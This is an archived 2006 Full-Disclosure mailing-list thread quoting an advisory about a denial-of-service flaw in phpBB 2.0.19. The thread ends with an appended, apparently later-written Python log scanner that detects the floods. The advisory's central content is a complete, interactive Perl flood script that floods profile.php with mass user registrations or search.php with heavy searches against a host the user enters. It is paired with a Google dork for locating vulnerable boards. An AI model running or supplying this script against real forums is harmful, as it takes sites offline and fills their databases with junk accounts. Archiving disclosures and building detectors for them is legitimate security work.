Open Source and information security mailing list archives
 
Message-ID: <9CA621425D6EAE4FBBD29326CC7D11060E9F38@unity-svr.Unity.local>
Date: Thu Jan 26 15:46:50 2006
From: Ed at unityitservices.co.uk (Edward Pearson)
Subject: HYSA-2006-001 phpBB 2.0.19 search.php andprofile.php DOS Vulnerability

No, I do believe full-disclosure to be the best method. In the case of DoS attacks, I think a point should be made of making sure the vendor is informed, and a patch available before disclosure, then I believe it's down to the author's discretion when he releases the exploit, even if it's a PoC.
   
________________________________

From: poo [mailto:skodliv@...il.com] 
Sent: 26 January 2006 11:31
To: Edward Pearson
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: [Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php andprofile.php DOS Vulnerability


so what you're saying is that DoS exploits shouldn't be disclosed?


On 1/25/06, Edward Pearson <Ed@...tyitservices.co.uk> wrote: 

	The less said about DoS attacks the better. A tactic mostly employed by asexual teenagers who live in their parents' basement and call themselves "h4x0rz". 
	  
________________________________

	From: full-disclosure-bounces@...ts.grok.org.uk [mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of h4cky0u
	Sent: 25 January 2006 14:44
	To: full-disclosure@...ts.grok.org.uk
	Cc: bugtraq@...urityfocus.com
	Subject: [Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php andprofile.php DOS Vulnerability
	
	 
	
	------------------------------------------------------
	      HYSA-2006-001 h4cky0u.org Advisory 010
	------------------------------------------------------
	Date - Wed Jan 25 2006
	
	
	
	TITLE:
	======
	
	phpBB 2.0.19 search.php and profile.php DOS Vulnerability
	
	
	SEVERITY:
	=========
	
	High
	
	
	SOFTWARE:
	=========
	
	phpBB 2.0.19 and prior
	
	
	INFO:
	=====
	
	phpBB is a high powered, fully scalable, and highly customizable 
	Open Source bulletin board package. phpBB has a user-friendly 
	interface, simple and straightforward administration panel, and 
	helpful FAQ. Based on the powerful PHP server language and your 
	choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, 
	phpBB is the ideal free community solution for all web sites.
	
	Support Website : http://www.phpbb.com
	
	
	
	BUG DESCRIPTION:
	================
	
	The bug was originally found by HaCkZaTaN of NeoSecurityteam. The original exploit code can be found at -
	
	http://h4cky0u.org/viewtopic.php?t=637
	
	This one affected only versions up till phpBB 2.0.15. The exploit code has been recoded which affects the latest version too. The bug resides in the following two scripts-
	
	profile.php << By registering as many users as you can. 
	
	search.php  << By searching in a way that the db cannot understand.
	
	
	Proof Of Concept Code:
	======================
	
	#!/usr/bin/perl 
	####################################### 
	##   Recoded by: mix2mix and Elioni of http://ahg-khf.org 
	##   And h4cky0u Security Forums (http://h4cky0u.org) 
	##   Name: phpBBDoSReloaded
	##   Original Author: HaCkZaTaN of Neo Security Team 
	
	##   Tested on phpBB 2.0.19 and earlier versions
	##   Ported to perl by g30rg3_x
	##   Date: 25/01/06
	####################################### 
	use IO::Socket; 
	
	## Initialized X 
	$x = 0; 
	
	print q(
	
	  phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN
	  Recoded by Albanian Hackers Group &
	  h4cky0u Security Forums	
	
	); 
	print q(Host |without-> http://www.| ); 
	
	$host = <STDIN>; 
	chop ($host); 
	
	print q(Path |example-> /phpBB2/ or /| ); 
	$pth = <STDIN>; 
	chop ($pth); 
	
	print q(Flood Type |1 = If Visual Confirmation is disabled, 2 = If Visual Confirmation is enabled| ); 
	
	$type = <STDIN>; 
	chop ($type); 
	
	## Type 1: registration flood 
	if($type == 1){ 
	
	## User Loop for 9999 loops (enough for Flood xDDDD) 
	while($x != 9999) 
	{ 
	
	## Member that gets registered automatically: "X" 
	
	$uname = "username=AHG__" . "$x"; 
	
	## Email that gets registered in the database: "X" 
	$umail = "&email=AHG__" . "$x"; 
	
	$postit = "$uname"."$umail"."%40ahg-crew.org&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit"; 
	
	$lrg = length $postit; 
	
	my $sock = new IO::Socket::INET ( 
	                                 PeerAddr => "$host", 
	                                 PeerPort => "80", 
	                                 Proto => "tcp", 
	                                ); 
	die "\nNuk mundem te lidhemi me hostin sepse ësht dosirat ose nuk egziston: $!\n" unless $sock; 
	
	## Send the HTTP request for registering a user in phpBB forums through the socket 
	
	print $sock "POST $pth"."profile.php HTTP/1.1\n"; 
	print $sock "Host: $host\n"; 
	print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n"; 
	
	print $sock "Referer: $host\n"; 
	print $sock "Accept-Language: en-us\n"; 
	print $sock "Content-Type: application/x-www-form-urlencoded\n"; 
	print $sock "Accept-Encoding: gzip, deflate\n"; 
	
	print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; 
	print $sock "Connection: Keep-Alive\n"; 
	print $sock "Cache-Control: no-cache\n"; 
	
	print $sock "Content-Length: $lrg\n\n"; 
	print $sock "$postit\n"; 
	close($sock); 
	
	## Print a "+" for every loop 
	syswrite STDOUT, "+"; 
	
	$x++; 
	} 
	
	
	
	## Type 2: search flood 
	} 
	elsif ($type == 2){ 
	
	while($x != 9999) 
	{ 
	## Final Search String to Send 
	$postit = "search_keywords=Albanian+Hackers+Group+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200"; 
	
	
	## POST body length 
	$lrg = length $postit; 
	
	## Connect Socket with Variables Provided By User 
	my $sock = new IO::Socket::INET ( 
	                                 PeerAddr => "$host", 
	                                 PeerPort => "80", 
	                                 Proto => "tcp", 
	                                ); 
	die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock; 
	
	## Send the HTTP request for a search the DB cannot handle into phpBB forums through the socket 
	print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n"; 
	print $sock "Host: $host\n"; 
	
	
	print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"; 
	print $sock "Referer: $host\n"; 
	print $sock "Accept-Language: en-us\n"; 
	
	print $sock "Content-Type: application/x-www-form-urlencoded\n"; 
	print $sock "Accept-Encoding: gzip, deflate\n"; 
	print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; 
	print $sock "Connection: Keep-Alive\n"; 
	print $sock "Cache-Control: no-cache\n"; 
	print $sock "Content-Length: $lrg\n\n"; 
	print $sock "$postit\n"; 
	
	close($sock); 
	
	## Print a "+" for every loop 
	syswrite STDOUT, "+"; 
	
	## Increment X in One for every Loop 
	$x++; 
	} 
	}else{ 
	## WTF??? What did you type 
	   die "Mundësia nuk Lejohet +_-???\n"; 
	
	}
	
	
	FIX:
	====
	
	No fix available as of date.
	
	
	GOOGLEDORK:
	===========
	
	"Powered by phpBB" 
	
	
	CREDITS:
	========
	
	- This vulnerability was discovered and researched by HaCkZaTaN of NeoSecurityteam.
	
	
	
	- Exploit recoded by mix2mix of [AHG-KHF] Security Team for the latest release of the script -
	
	Web : http://ahg-khf.org
	
	mail : webmaster at ahg-khf dot org
	
	
	
	- Co Researcher -
	
	h4cky0u of h4cky0u Security Forums.
	
	mail : h4cky0u at gmail dot com
	
	web : http://www.h4cky0u.org
	
	
	ORIGINAL ADVISORY:
	==================
	
	
	http://www.h4cky0u.org/advisories/HYSA-2006-001-phpbb.txt
	
	
	-- 
	http://www.h4cky0u.org
	(In)Security at its best... 

	_______________________________________________ 
	Full-Disclosure - We believe in it.
	Charter: http://lists.grok.org.uk/full-disclosure-charter.html 
	Hosted and sponsored by Secunia - http://secunia.com/
	
	




-- 
smile tomorrow will be worse 
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060126/4c794669/attachment.html
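The advisory quoted above names two flood patterns: mass registrations through profile.php and repeated heavy searches through search.php?mode=results. From a defender's side both show up in ordinary web-server access logs as a burst of POSTs from one client to one script, which is enough to raise an alert or feed a rate limiter. The script below is an added example written for this thread; it is not code from the advisory, the list posters or phpBB. It assumes Apache/nginx "combined" log lines, and the threshold, window length, IP addresses and log lines are constructed values, not figures from the advisory.

```python
"""Flood detector for the two phpBB 2.0.19 scripts named in the advisory.

Added example, not code from the advisory, the thread or phpBB. It scans
web-server access-log lines in the Apache/nginx "combined" format and raises
one alert per client IP that POSTs to profile.php (registrations) or
search.php (searches) more than THRESHOLD times inside a WINDOW-second
sliding window. Thresholds and log lines are constructed for the demo.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timezone

WATCHED = ("/profile.php", "/search.php")   # scripts the advisory names
THRESHOLD = 20   # POSTs per window per IP before alerting (assumed value)
WINDOW = 60      # sliding-window length in seconds (assumed value)

# "combined" format: ip ident user [ts] "METHOD path proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Return (ip, timestamp, method, path-without-query) or None if unparsable."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    path = m.group("path").split("?", 1)[0]   # search.php?mode=results -> search.php
    return m.group("ip"), ts, m.group("method"), path


def detect_floods(lines, threshold=THRESHOLD, window=WINDOW):
    """Return [(ip, script, window_start_iso)] for every (ip, script) that floods.

    Only the first crossing of the threshold is reported for a given pair, so
    a 9999-request loop like the one in the PoC yields a single alert.
    """
    recent = defaultdict(deque)   # (ip, script) -> timestamps inside the window
    alerted = set()
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path = rec
        if method != "POST" or not path.endswith(WATCHED):
            continue
        key = (ip, path.rsplit("/", 1)[-1])
        q = recent[key]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window:   # drop timestamps that aged out
            q.popleft()
        if len(q) > threshold and key not in alerted:
            alerted.add(key)
            alerts.append((ip, key[1], q[0].isoformat()))
    return alerts


def sample_log():
    """Constructed log lines: one client floods profile.php, the rest is normal."""
    base = datetime(2006, 1, 26, 11, 31, 0, tzinfo=timezone.utc)
    lines = []
    for i in range(25):   # 25 registrations in 25 seconds from one address
        stamp = base.replace(second=i).strftime("%d/%b/%Y:%H:%M:%S %z")
        lines.append(f'203.0.113.7 - - [{stamp}] '
                     f'"POST /phpBB2/profile.php HTTP/1.1" 200 5321')
    lines.append('198.51.100.4 - - [26/Jan/2006:11:31:05 +0000] '
                 '"GET /phpBB2/index.php HTTP/1.1" 200 8877')
    for i in range(3):    # a few genuine searches, well under the threshold
        lines.append(f'198.51.100.4 - - [26/Jan/2006:11:31:1{i} +0000] '
                     f'"POST /phpBB2/search.php?mode=results HTTP/1.1" 200 4410')
    lines.append('not a log line')   # parser must skip junk without crashing
    return lines


if __name__ == "__main__":
    for ip, script, since in detect_floods(sample_log()):
        print(f"ALERT {ip} flooding {script} since {since}")
```

Because the registration form's `mode=register` field travels in the POST body, which access logs do not record, the detector counts every POST to profile.php rather than only registrations; tune the threshold to the board's normal traffic before acting on alerts. The same per-IP sliding window, placed in front of the two scripts as a rate limit rather than after the fact as a log scan, is the mitigation that removes the flood vector while the advisory lists no vendor fix.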
